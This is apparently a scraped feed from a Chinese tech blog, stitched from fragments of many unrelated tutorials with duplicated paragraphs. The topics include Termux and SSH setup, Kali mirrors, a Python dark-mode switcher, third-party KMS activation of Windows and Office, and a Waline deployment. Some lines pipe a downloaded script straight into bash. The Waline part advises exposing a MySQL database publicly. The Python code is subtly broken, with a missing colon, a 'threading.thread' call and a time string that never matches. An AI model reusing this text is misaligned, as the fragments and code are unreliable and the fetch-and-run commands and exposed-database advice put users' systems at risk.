<category android:name="android.intent.category.BROWSABLE" />
<!-- Edit android:host to handle links to the target URL-->
<data
android:host="hestudio.net"
android:scheme="https" />
</intent-filter>
</activity>
</application>
</manifest>
你可以使用assetlinks.json验证程序是否合法。那么你需要准备一些东西,包括签名证书。
.well-known文件夹,并在里面新建assetlinks.jsonGit 是一个强大的工具,这里罗列一下它的一些工具,相信看完这篇文章你也可以熟练的使用 Git 的命令行。
这里就不讲解安装方法了,关于 Git 的安装详见 起步 - 安装 Git
]]>Git 是一个强大的工具,这里罗列一下它的一些工具,相信看完这篇文章你也可以熟练的使用 Git 的命令行。
这里就不讲解安装方法了,关于 Git 的安装详见 起步 - 安装 Git
]]>wget https://res.hestudio.net/kali_for_android/patch/ka_install_patch_230110 && bash ka_install_patch_230110
如果你修改过 DNS 设置,请不要进行安装,该补丁会覆盖 DNS 服务器设置。
wget https://res.hestudio.net/kali_for_android/patch/ka_install_patch_230107 && bash ka_install_patch_230107
如果你修改过 DNS 设置,请不要进行安装,该补丁会覆盖 DNS 服务器设置。
wget https://res.hestudio.net/kali_for_android/patch/ka_install_patch_230107 && bash ka_install_patch_230107
那么其实我们也可以自己做一个 MFA 验证器。本着只要网上有,绝不自己做的原则,我们将使用开源模块拼凑而成。
那么其实我们也可以自己做一个 MFA 验证器。本着只要网上有,绝不自己做的原则,我们将使用开源模块拼凑而成。
相关信息
这里只讲解它的原理,图形方案交给你们设计。
我们需要准备 PEM 格式的证书文件。新建一个文档,将私钥放在上面,另起一行,在底下粘贴公钥部分。
]]>我们需要准备 PEM 格式的证书文件。新建一个文档,将私钥放在上面,另起一行,在底下粘贴公钥部分。
在服务器上执行
# 备份文件
cp /etc/ssl/private/pure-ftpd.pem /etc/ssl/private/pure-ftpd.pem.bak
# 编辑证书文件
vim /etc/ssl/private/pure-ftpd.pem
将刚才连接好的证书粘贴在上面。:wq保存文件。登录宝塔面板,转到 软件商店 -> Pure-Ftpd 设置 -> 重启。
再次登录 FileZilla , 尝试连接后,报错消失了。
这里以 Termux 为例,同时也适用与其他 Linux 版本
本篇教程都是以~/.bashrc(bash)或~/.zshrc(zsh)为基础的(小白可读),所以要学会编辑文件。
由于不同的终端对应不同的文件,所以需要查看你的终端类型。
]]>这里以 Termux 为例,同时也适用与其他 Linux 版本
本篇教程都是以~/.bashrc(bash)或~/.zshrc(zsh)为基础的(小白可读),所以要学会编辑文件。
由于不同的终端对应不同的文件,所以需要查看你的终端类型。
echo $0
使用这个命令查看终端类型
例如,我这个终端就是 zsh
然后使用下面的其中之一编辑对应的文件
vim ~/.bashrc
或
vim ~/.zshrc
相关信息
vim 基础使用方法 | 操作 | 对应的命令 | |
使用以下命令修改 root 密码
sudo passwd root
在 Linux 输入密码时不会显示,即使你已经输入完了。
vim /etc/apt/sources.list
这里以 kali 为例 其他 linux 系统的镜像源请自行百度。
#阿里源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华源
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
把两条源地址添加在 sources.list 文件末尾,默认官方源是开启的只需要在“官方源”前面加【#】号就可以关闭。
以 Debian[1]系 linux 为例
sudo apt-get update
以 Debian 系 linux 为例
sudo apt-get upgrade
以 Debian 系 linux 为例
sudo apt-get dist-upgrade
基于 Debian 的 Linux 发行版,一般使用apt作为软件包管理器,安装.deb格式的软件包。 ↩︎
AtlasOS 是一个开源免费的项目,旨在为游戏玩家提供最合适用于运行游戏的操作系统。它基于 Windows 10 定制而来,“精简”删除了各种非必要的系统组件,剥离了众多的 Windows 后台进程,从而为游戏节省出大量的系统资源。
]]>AtlasOS 是一个开源免费的项目,旨在为游戏玩家提供最合适用于运行游戏的操作系统。它基于 Windows 10 定制而来,“精简”删除了各种非必要的系统组件,剥离了众多的 Windows 后台进程,从而为游戏节省出大量的系统资源。
所以我下载了一个来实际体验一下究竟有没有那么厉害。我下载的是它的 20H2 版本,也是他们推荐的版本。
它的下载源在 Github 上,所以有的时候会出现无法下载的情况。这时我们需要 Watt Toolkit[1]。终于能下了,但是这速度有点...
原 Steam++,官网地址是 https://steampp.net ↩︎
相关信息
这里只讲解它的原理,图形方案交给你们设计。
通过查阅资料可知,切换电脑深浅色可以通过修改注册表实现,这里提供两串代码
reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 0 /f
reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 0 /f
reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 1 /f
reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 1 /f
因为从 Windows 10 v1903 开始,深色主题分为 Windows 模式(每个代码块上半部分)和应用模式(每个代码块下半部分),这时我们就需要判断 Windows 版本号。
我们打开cmd.exe,通过执行ver命令可以获取版本号。
C:\Users\hestudio>ver
Microsoft Windows [版本 10.0.22621.819]
我们需要的是22621这部分内容,所以我们需要获取这部分内容,代码是
import os
os.popen("ver").read()[28:33]
通过查阅资料可知,Windows 10 v1903 的版本号是10.0.18362.xxx,所以我们可以通过以下代码判断
ver = int(os.popen("ver").read()[28:33]) >= 18362
如果返回结果为True那么就执行两个指令,否则执行一个指令。
那么,这部分的完整代码为
import os
# 定义深浅色命令
DARK_SYSTEM = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 0 /f"
DARK_APPS = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 0 /f"
LIGHT_SYSTEM = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 1 /f"
LIGHT_APPS = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 1 /f"
# 检查版本
ver = int(os.popen("ver").read()[28:33]) >= 18362
# 深色切换函数
def dark():
os.system(DARK_SYSTEM)
if ver:
os.system(DARK_APPS)
return 0
# 浅色切换函数
def light():
os.system(LIGHT_SYSTEM)
if ver:
os.system(LIGHT_APPS)
return 0
实现自动切换可以通过计划任务控制。为了方便展示原理,我这里直接用函数表示,在实际运用中,这里通常是可以变化的。
首先我们需要实时获取现在的时间
import time
import threading
def time_get():
global now_time
while True:
now_time = time.strftime('%H:%M', time.localtime())
get_time = threading.thread(target=time_get)
get_time.start()
通过获取预设直接调用函数
while True:
if now_time == '6:00':
light()
elif now_time == '20:00'
dark()
当然,这里也可以实现自动切换壁纸,只需要在if内的light()或者dark()的底下利用os.system()执行对应的命令即可。有关切换壁纸的 cmd 命令,你可以在百度中查找。
最后将上面的代码总结一下
import os
import time
import threading
# 定义深浅色命令
DARK_SYSTEM = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 0 /f"
DARK_APPS = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 0 /f"
LIGHT_SYSTEM = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 1 /f"
LIGHT_APPS = "reg.exe add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 1 /f"
# 检查版本
ver = int(os.popen("ver").read()[28:33]) >= 18362
# 深色切换函数
def dark():
os.system(DARK_SYSTEM)
if ver:
os.system(DARK_APPS)
return 0
# 浅色切换函数
def light():
os.system(LIGHT_SYSTEM)
if ver:
os.system(LIGHT_APPS)
return 0
# 实时获取时间函数
def time_get():
global now_time
while True:
now_time = time.strftime('%H:%M', time.localtime())
# 计划程序
if __name__ == "__main__":
get_time = threading.thread(target=time_get)
get_time.start()
while True:
if now_time == '6:00':
light()
elif now_time == '20:00'
dark()
你可以自主设计一个前端,通过调用dark()和light()切换对应的模式。
]]>而且,听说Windows11 在后续的更新中要加入快速切换的按钮。
launch.json文件.vscode/launch.json文件console为externalTerminal"console": "externalTerminal"
此步适用于 Windows10/11,这里以 Windows11 为例
关注微信公众号 heStudio Community回复 linktowindows 获取下载链接。
注意
本文中提供的并不是最新版本,如果出现链接问题,请尝试将电脑和手机上的 App 都更新到最新版本。电脑版本可以在 Microsoft Store 更新,而手机版本可以在 Google Play Store 更新。
查看通知,照片,发送短信,拨打电话(需要蓝牙),查看手机照片,快速修改手机设置
然而,在手机上敲代码总是有一些别扭,所以这篇文章就教你怎么远程链接,也就是用 ssh 连接。
]]>然而,在手机上敲代码总是有一些别扭,所以这篇文章就教你怎么远程链接,也就是用 ssh 连接。
pkg install openssh -y
sshd
ssh localhost -p 8022
如果出现图片上的画面,则已经开启 ssh 服务
Termux 的 sshd 只能通过密钥登陆,因此你需要在客户端上生成密钥对。
ssh-keygen
把客户端上的公钥加到 Termux 中的 .ssh/authorized_keys,这一步比较麻烦。因为你无法使用 ssh-copy-id,只能先把 id_rsa.pub 拷贝到手机上,再在手机上打开该文件,拷贝文件内容后在 Termux 中用 vi 打开 authorized_keys,并复制内容进去。
或者在电脑上将 id_rsa.pub 文件(是整个文件,不是复制文件内容)拖到文件传输助手中,在手机上用 Termux 打开,点击 EDIT ,然后打开 termux
cat ~/downloads/id_rsa.pub >> ~/.ssh/authorized_keys
不过如果客户端上本身也开启了 ssh 服务的话,则会简单很多,可以在 Termux 上执行
ssh user@clinet "cat ~/.ssh/id_rsa.pub" >> ~/.ssh/authorized_keys
就行了,其中 clinet 为客户端的地址,user 为登陆用户.
在客户端上执行
ssh 127.0.0.1 -p 8022
把 127.0.0.1 换成手机 ip
手机 IP 可以在 设置 --> WLAN --> 高级设置 里查看
]]>最后一次更新:2022.11.1
提示
了解如何自己搭建一个 KMS 服务器请访问: https://www.hestudio.net/posts/build-a-kms-server-yourself.html
提示
了解如何自己搭建一个 KMS 服务器请访问: https://www.hestudio.net/posts/build-a-kms-server-yourself.html
kms.hestudio.net
slmgr.vbs /skms kms.hestudio.net
slmgr.vbs /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
相关信息
Windows 和 Windows Server 的 GVLK 代码可以在这里获取:https://docs.microsoft.com/zh-cn/windows-server/get-started/kms-client-activation-keys
slmgr.vbs /ato
注意
这里的教程仅适用于 Office 2016 以后的版本,早于此版本的 Office 仍然可以使用这个 KMS 服务,但是这里不提供相关资料,需要自行摸索。
C:\Program Files\Microsoft Office\Office16\文件夹内;如果是 64 位的计算机安装了 32 位的系统,那么它应该在C:\Program Files (x86)\\Microsoft Office\Office16\cscript ospp.vbs /sethst:kms.hestudio.net
cscript ospp.vbs /inpkey:xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
相关信息
Office 的 GVLK 代码可以在这里获取:https://docs.microsoft.com/zh-cn/deployoffice/vlactivation/gvlks
cscript ospp.vbs /act
Waline 是一款从 Valine 衍生的带后端评论系统。可以将 Waline 等价成 With backend Valine.它的强大的自由度吸引力我。这里不多介绍,详细请浏览 https://waline.js.org
因为咱也是有服务器的人了,所以我们直接全私有部署。详细的方案如以下所示:
其他的部署方案请在 waline 官网查看,这里只讲述独立部署。
]]>Waline 是一款从 Valine 衍生的带后端评论系统。可以将 Waline 等价成 With backend Valine.它的强大的自由度吸引力我。这里不多介绍,详细请浏览 https://waline.js.org
因为咱也是有服务器的人了,所以我们直接全私有部署。详细的方案如以下所示:
其他的部署方案请在 waline 官网查看,这里只讲述独立部署。
我打算用docker-compose部署到我们的服务器上,那么我们就需要准备docker-compose.yml
version: "3.8"
services:
web:
image: "lizheming/waline"
restart: always
ports:
- 127.0.0.1:8360:8360
volumes:
- ${PWD}/data:/app/data
environment:
# 这里怎么填详见下文
那么我们还需要填写环境,有关环境变量的相关内容因为篇幅太长,所以我直接放传送门 https://waline.js.org/reference/env.html
众所周知,HTTP 是明文传输的,而 HTTPS 是密文传输。所以我们想要实现密文传输,就需要 SSL 证书和 Nginx 反向代理。 SSL 证书我们使用 Let's Encrypt 即可,现在我们要设置的是 Nginx 反向代理。
这里以宝塔面板为例,
由于我们用的是 MySQL,所以直接跳过传送门上面的内容,直接转到 MySQL 位置。
这里就有一个问题,就是你必须保证你的数据库在外部能访问,localhost在这里无效(别问我怎么知道的),你需要打开权限才能保证你的数据库在外边能访问,下文主机地址需要填写你的公网 IP 或者域名(像www.hestudio.net这样没有协议头和斜杠的纯域名)
注意
你的数据库在外部能访问,建议你不要用默认的数据库端口号(3306)
初次使用需要向 MySQL 数据库导入一段数据,将以下内容复制,另存为以.sql为后缀的文件,然后导入数据库。
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
SET NAMES utf8mb4;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
# Dump of table wl_Comment
#